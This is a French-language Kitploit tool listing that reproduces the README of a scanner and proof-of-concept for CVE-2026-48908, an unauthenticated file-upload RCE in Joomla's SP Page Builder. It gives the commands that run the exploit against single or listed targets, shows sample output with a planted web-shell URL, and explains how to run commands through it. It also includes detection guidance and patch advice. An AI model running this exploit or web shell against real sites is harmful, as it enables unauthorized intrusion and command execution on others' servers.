Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-48908-by-yora — Vérificateur de sécurité passif pour CVE-2026-48908 affectant SP Page Builder. | Kitploit
Outils/GitHubGitHub/yora1928/cve-2026-48908-by-yora
ReconnaissanceScanners de VulnérabilitésScanners de Vulnérabilités WebGénération de PayloadsExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'IntrusionRed Teaming
GitHubyora1928/cve-2026-48908-by-yora
2il y a 8 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CVE-2026-48908-by-yora

Vérificateur de sécurité passif pour CVE-2026-48908 affectant SP Page Builder.

Voir le dépôt
Partager

🔐 CVE-2026-48908 Scanner + PoC (Exploit sûr)

[ Joomla SP Page Builder — RCE non authentifié ]

Python License Joomla

Développé par yora


📌 À propos de ce projet

Ce projet est un outil de recherche en sécurité développé par yora pour détecter et prouver la vulnérabilité CVE-2026-48908 dans l'extension SP Page Builder pour Joomla.

Cette vulnérabilité permet à un attaquant sans authentification de téléverser un fichier PHP via l'endpoint asset.uploadCustomIcon, qui est ensuite extrait dans un répertoire public et peut être exécuté → Remote Code Execution (RCE).

Versions affectées : SP Page Builder 1.0.0 à 6.6.1 (corrigé dans ).

Télécharger l’outil
6.6.2

⚠️ Avertissement – Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite de tester. Une utilisation sans autorisation est illégale.


👨‍💻 Développeur

Ce projet est développé et maintenu par :

  • yora — GitHub • Twitter

Soutenu par la communauté de la sécurité et la recherche indépendante.


✨ Fonctionnalités principales

FonctionnalitéDescription
🔍 Détection des composantsDétecte Joomla et SP Page Builder à partir de diverses sources (robots.txt, administrator, asset, HTML).
📌 Empreinte de versionIdentifie la version de SP Page Builder à partir des CSS/JS, des balises meta et du fichier manifeste.
🧪 Validation de l'endpointTeste l'accès à asset.uploadCustomIcon sans authentification.
📊 Classification intelligenteLes résultats sont classés en CONFIRMED / LIKELY / NOT_VULNERABLE / UNKNOWN avec des raisons et un niveau de confiance.
🚀 Exploit adaptatifSi --exploit est utilisé, l'outil essaie différentes extensions PHP (.php, .php3, .phtml, .PHP, etc.) et .htaccess pour prouver la RCE en toute sécurité.
📁 Sortie JSONToutes les preuves sont enregistrées dans un fichier .json pour l'audit et les rapports.
⚡ Multi‑threadingScanne plusieurs cibles à la fois avec --list et les paramètres de threads.
🧹 Nettoyage--cleanup affiche les commandes pour supprimer les artefacts téléversés.

🚀 Installation

Cloner le dépôt

root@kitploit:~
git clone https://github.com/yora1928/CVE-2026-48908-by-yora.git
cd CVE-2026-48908-by-yora

Installer les dépendances

root@kitploit:~
python -m pip install -r requirements.txt

requirements.txt :

root@kitploit:~
requests>=2.28.0

📖 Guide d'utilisation

1️⃣ Détection uniquement (sans exploitation)

root@kitploit:~
python scanner.py --url https://target-website.com

Exemple de sortie :

root@kitploit:~
[🔴 CONFIRMED] https://target-website.com
    ├─ SP detected
    ├─ v6.3.1
    └─ Vulnerable version 6.3.1 and endpoint open

2️⃣ Détection + preuve de la RCE (exploit sûr)

root@kitploit:~
python scanner.py --url https://target-website.com --exploit

Ce qui se passe :

  • L'outil détecte la version vulnérable.
  • Téléverse un fichier PHP avec un jeton secret.
  • Tente d'accéder à ce fichier pour confirmer l'exécution.
  • En cas de succès, affiche l'URL du shell prête à l'emploi.

Exemple de sortie réussie (issue d'un test réel) :

root@kitploit:~
[*] Scanning: https://target-website.com
[*] Target confirmed vulnerable. Running adaptive exploit...
[*] Trying method: php                 -> EXECUTED
[🔴 CONFIRMED] https://target-website.com
    ├─ SP detected
    ├─ v6.3.1
    └─ Vulnerable version 6.3.1 and endpoint open
    └─ ✅ RCE confirmed via PoC upload!
         Shell URL: https://target-website.com/media/com_sppagebuilder/assets/iconfont/icoyjdehd/fonts/fpqofpk.php?t=7f5e90gcxx0j0r51&c=<cmd>
         Created dirs: media/com_sppagebuilder/assets/iconfont/icoyjdehd

Comment utiliser l'URL du shell :

  • Accédez à l'URL avec le paramètre c contenant la commande à exécuter.
  • Exemple : ...?t=7f5e90gcxx0j0r51&c=whoami
  • La sortie de la commande apparaîtra sur la page.

🔐 Jeton (t=...) est secret – ne partagez pas l'URL du shell avec des personnes non autorisées.


3️⃣ Scanner plusieurs cibles à partir d'un fichier

Créez un fichier targets.txt (une URL par ligne) :

root@kitploit:~
https://site1.com
https://site2.com

Exécutez :

root@kitploit:~
python scanner.py --list targets.txt --threads 5

Avec exploitation :

root@kitploit:~
python scanner.py --list targets.txt --threads 5 --exploit

4️⃣ Enregistrer les résultats dans un fichier JSON

root@kitploit:~
python scanner.py --url https://target.com --output reports/hasil.json

5️⃣ Nettoyage (supprimer les artefacts)

Une fois terminé, nettoyez le répertoire créé :

root@kitploit:~
python scanner.py --url https://target.com --exploit --cleanup

Remarque : --cleanup affiche la commande rm -rf à exécuter manuellement (car les permissions d'écriture peuvent être limitées). Si vous disposez d'un accès FTP/SSH, supprimez le répertoire indiqué dans Created dirs.


📊 Interprétation des résultats de classification

StatutSignificationAction recommandée
🔴 CONFIRMEDSP Page Builder détecté, version vulnérable (≤ 6.6.1), et endpoint asset.uploadCustomIcon accessible sans authentification. Vulnérable.Mettez immédiatement à jour SP Page Builder vers 6.6.2 ou une version ultérieure. Si --exploit a été utilisé, supprimez les artefacts téléversés.
🟡 LIKELYSP détecté, version vulnérable, mais le statut d'authentification de l'endpoint n'a pas pu être confirmé. Probablement vulnérable.Vérifiez manuellement en accédant à l'endpoint index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon sans connexion. Si vous n'êtes pas redirigé vers la connexion, alors il est vulnérable.
🟢 NOT_VULNERABLESP Page Builder version ≥ 6.6.2 (déjà corrigée) détectée. Sûr.Aucune action supplémentaire requise.
⚪ UNKNOWNSP Page Builder non détecté, ou version non identifiable, ou données insuffisantes.Vérifiez manuellement si SP Page Builder est installé. Si c'est le cas, essayez de détecter la version via le fichier sppagebuilder.xml dans /administrator/components/com_sppagebuilder/.
❌ ERRORErreur de connexion ou délai d'attente dépassé.Vérifiez la connexion Internet, le pare-feu, ou essayez d'augmenter le délai d'attente avec --timeout 60.

📁 Exemple de rapport JSON

Le fichier scan_result.json contient toutes les preuves collectées :

root@kitploit:~
{
  "scanner": "CVE-2026-48908 Scanner + Exploit",
  "scan_time": "2026-08-13T10:30:00.123456+00:00",
  "total_targets": 1,
  "results": [
    {
      "target": "https://target.com",
      "classification": {
        "status": "CONFIRMED",
        "confidence": "high",
        "reasoning": ["Vulnerable version 6.3.1 and endpoint open"],
        "evidence_summary": ["SP asset at /components/..."]
      },
      "exploit_result": {
        "upload_success": true,
        "access_success": true,
        "shell_url": "https://target.com/media/.../fpqofpk.php?t=TOKEN&c=<cmd>",
        "created_dirs": ["media/com_sppagebuilder/assets/iconfont/icoyjdehd"]
      }
    }
  ]
}

📁 Structure du projet

root@kitploit:~
CVE-2026-48908-by-yora/
├── scanner.py          # File utama (deteksi + exploit)
├── requirements.txt    # Dependensi Python
├── README.md           # Dokumentasi ini
├── SECURITY.md         # Kebijakan keamanan dan pelaporan
├── LICENSE             # Lisensi MIT
├── detection/          # (opsional) modul deteksi tambahan
├── poc/                # (opsional) PoC alternatif
└── reports/            # Tempat menyimpan hasil JSON (otomatis)

🔒 Éthique et responsabilité

  • Utilisez cet outil uniquement sur les systèmes que vous possédez ou pour lesquels vous avez reçu une autorisation écrite.
  • Ne l'utilisez pas pour :
    • Effectuer des scans aléatoires sur Internet.
    • Collecter des cibles vulnérables à attaquer.
    • Accéder illégalement aux systèmes d'autrui.
  • Une fois terminé, supprimez tous les artefacts (fichiers et répertoires téléversés).
  • L'auteur (yora) n'est pas responsable de l'utilisation abusive de cet outil.

En utilisant cet outil, vous acceptez d'être entièrement responsable de vos actions.


📬 Contribution et signalement

Si vous rencontrez un problème ou souhaitez contribuer, veuillez ouvrir une Issue ou une Pull Request sur ce dépôt.

Pour les rapports de sécurité, suivez les directives dans SECURITY.md.


📜 Licence

Ce projet est sous licence MIT License – consultez le fichier LICENSE pour plus de détails.


🙏 Remerciements

  • Découverte de la CVE : CERT Vanuatu, Censys, Check Point
  • Recherche et implémentation du PoC : yora et la communauté de la sécurité.

Développé avec ❤️ par yora